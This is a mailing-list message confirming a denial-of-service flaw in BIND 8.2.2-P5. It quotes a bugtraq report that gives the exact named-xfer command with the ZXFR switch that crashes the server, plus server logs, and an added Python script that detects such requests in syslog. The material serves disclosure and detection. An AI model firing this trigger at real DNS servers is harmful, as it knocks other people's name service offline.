Debian 2.2 IS vulnerable to the following DOS reported by Fabio
Pietrosanti (naif) <[EMAIL PROTECTED]> in bugtraq:
<<
Hi,
playing with bind and the ZXFR feature ( zone transfer compressed with a
possible insecure execlp("gzip", "gzip", NULL); ), I discovered a
Denial Of Service against Bind 8.2.2-P5.
By default Bind 8.2.2-P5 is not compiled with ZXFR support unless
you define it with #define BIND_ZXFR so it will refuse any ZXFR
transfer, because it doesn't support it. But now what happens? Look
here...
################################
zone to transfer: zone.pippo.com
dns server: dns.pippo.com 192.168.1.1
me: naif.gatesux.com 10.10.10.10
I send a Zone Transfer request using the "-Z" switch, which means that I wish to use
ZXFR.
dns.pippo.com doesn't support ZXFR and has "allow-transfer{}" not configured,
so everyone
could ask it for *.zone.pippo.com ...
<[EMAIL PROTECTED]> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
On the server's log:
Nov 7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
Nov 7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284
Then the server "*** CRASHED ***" .
I should assume that bind 8.2.2-P5 is vulnerable (please someone test and
confirm this kind of DoS)
and bind-9.0.0 has no support for ZXFR.
<[EMAIL PROTECTED]> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\} ';' | wc -l
234
<[EMAIL PROTECTED]> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\} ';' | wc -l
0
A lot of DNS servers are misconfigured and allow zone-transfer to any, so they
are DoSable...
naif
[EMAIL PROTECTED]
>>
Here is my daemon.log:
Nov 9 15:13:19 ns12 named[137]: approved ZXFR from [192.168.1.10].1642 for "domain.org"
Nov 9 15:13:19 ns12 named[137]: unsupported XFR (type ZXFR) of "domain.org" (IN) to [192.168.1.10].1642
Nov 9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
Nov 9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
And named was down...
Regards,
Jean-Marc Boursot
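
Added example, not part of the original message or of BIND: Python that scans named syslog output for the two messages both logs above show, an approved ZXFR followed by the "unsupported XFR (type ZXFR)" rejection, and lists the requesting clients. The function names and the AXFR sample line are assumptions made for this example.

```python
import re

# Message formats as they appear in the named logs quoted in this message.
APPROVED = re.compile(
    r'(?P<host>\S+?):? named\[(?P<pid>\d+)\]: approved ZXFR from '
    r'\[(?P<ip>[\d.]+)\]\.(?P<port>\d+) for "(?P<zone>[^"]+)"')
UNSUPPORTED = re.compile(
    r'(?P<host>\S+?):? named\[(?P<pid>\d+)\]: unsupported XFR \(type ZXFR\) '
    r'of "(?P<zone>[^"]+)" \(IN\) to \[(?P<ip>[\d.]+)\]\.(?P<port>\d+)')

# Constructed sample: the daemon.log lines above, unwrapped, plus one
# constructed AXFR line that must not be reported.
SAMPLE_LOG = [
    'Nov 9 15:13:02 ns12 named[137]: approved AXFR from [192.168.1.20].1630 for "domain.org"',
    'Nov 9 15:13:19 ns12 named[137]: approved ZXFR from [192.168.1.10].1642 for "domain.org"',
    'Nov 9 15:13:19 ns12 named[137]: unsupported XFR (type ZXFR) of "domain.org" (IN) to [192.168.1.10].1642',
    'Nov 9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set',
]


def find_zxfr_requests(lines):
    """Return one record per ZXFR request, pairing the two log messages."""
    events = {}
    for line in lines:
        for field, pattern in (("approved", APPROVED), ("unsupported", UNSUPPORTED)):
            m = pattern.search(line)
            if not m:
                continue
            # Same named process, same client socket, same zone = one request.
            key = (m["host"], m["pid"], m["ip"], m["port"], m["zone"])
            rec = events.setdefault(key, {
                "host": m["host"], "pid": int(m["pid"]), "client": m["ip"],
                "zone": m["zone"], "approved": False, "unsupported": False})
            rec[field] = True
    return list(events.values())


def clients_to_review(lines):
    """Clients whose ZXFR was approved and then rejected as unsupported,
    the sequence both logs in this message show before named went down."""
    return sorted({e["client"] for e in find_zxfr_requests(lines)
                   if e["approved"] and e["unsupported"]})


if __name__ == "__main__":
    for event in find_zxfr_requests(SAMPLE_LOG):
        print(event)
    print("review:", clients_to_review(SAMPLE_LOG))
```

Feed it unwrapped syslog lines; the mailer-wrapped form shown in this message has to be rejoined first.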